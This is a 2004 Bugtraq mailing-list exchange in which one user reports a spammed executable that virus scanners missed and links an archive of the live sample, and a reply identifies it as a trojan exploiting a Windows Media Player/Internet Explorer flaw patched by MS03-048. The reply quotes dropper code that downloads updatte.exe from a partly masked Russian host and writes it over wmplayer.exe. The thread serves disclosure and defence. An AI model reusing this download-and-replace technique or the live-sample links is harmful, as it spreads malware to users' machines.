<<< Date Index >>>     <<< Thread Index >>>

Re: new WIN virus?



In-Reply-To: <Pine.BSF.4.58.0401290056100.39640@xxxxxxxxxxxxxxxxxxxxxxx>

This is a lame trojan? trying to exploit the Windows Media Player/Internet 
Explorer vulnerability (greetz to Liu Die Yu)

x.Open("GET", "http://www.****.ru/dan/updatte.exe",0);
[...]
s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);  

Online Demo : http://www.k-otik.com/WMPLAYER-TEST/

Vulnerability fixed with MS03-048 BID (8577, 9013, 9014, 9015).

Regards.
Chaouki B. /// http://www.k-otik.com



>From: Atom 'Smasher' <atom@xxxxxxxxxxxxxx>
>To: bugtraq@xxxxxxxxxxxxxxxxx
>Subject: new WIN virus?
>
>-----BEGIN PGP SIGNED MESSAGE-----
>Hash: SHA1
>
>i don't know much at all about windows, but this spam got past my spam
>filter and drew my attention. i tested the suspect file in some on-line
>virus checkers, and they all reported the file as not being a threat.
>looking at the page that the spam requested (hidden after "@" in the link)
>i can only think that the file is up to no-good.
>
>the original spam, the page that it requests, and the suspicious "exe"
>file:
>       http://smasher.suspicious.org/tmp/live-virus.tgz
>
>live-virus.tgz
>md5:  42e6edfe1dcbb3e83f3da997014c7858
>sha1: 372ef9ce498b3cd23cd7c0c2b404a18f7d1b7771
>
>the TGZ contains:
>- -rw-r--r-- atom/atom      1606 Jan 29 00:34 2004 spam
>- -rw-r--r-- atom/atom      1941 Jan 29 00:31 2004 gift-with-headers.html
>- -rw-r--r-- atom/atom      8704 Jan 28 22:41 2004 updatte.exe
>
>updatte.exe was tested on:
>   yahoo-mail
>   http://www.kaspersky.com/remoteviruschk.html
>   http://www.dials.ru/english/www_av/
>   http://www.rav.ro/scan/indexn.php
>and they all reported that the file poses no threat. i suspect they're
>wrong.
>
>
>       ...atom
>

>